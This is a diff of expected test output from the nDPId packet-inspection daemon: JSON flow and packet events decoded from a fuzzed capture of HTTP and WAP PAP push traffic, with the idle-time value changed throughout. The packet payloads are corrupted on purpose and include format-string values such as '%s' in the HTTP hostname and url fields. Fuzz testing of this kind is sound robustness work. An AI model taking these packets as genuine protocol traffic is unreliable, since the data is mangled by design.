+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2177,"global_ts_msec":1031854495447} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2177,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"AFCLk5N8CAAgsl17CIFFAAAsxLVAAEAGF9ysFAMNTBQDBQBQCirJ0lLg5GTHa2ASgywbsgAAAgQFtA=="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26,"global_ts_msec":1031854495447} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} -01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} +01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"} 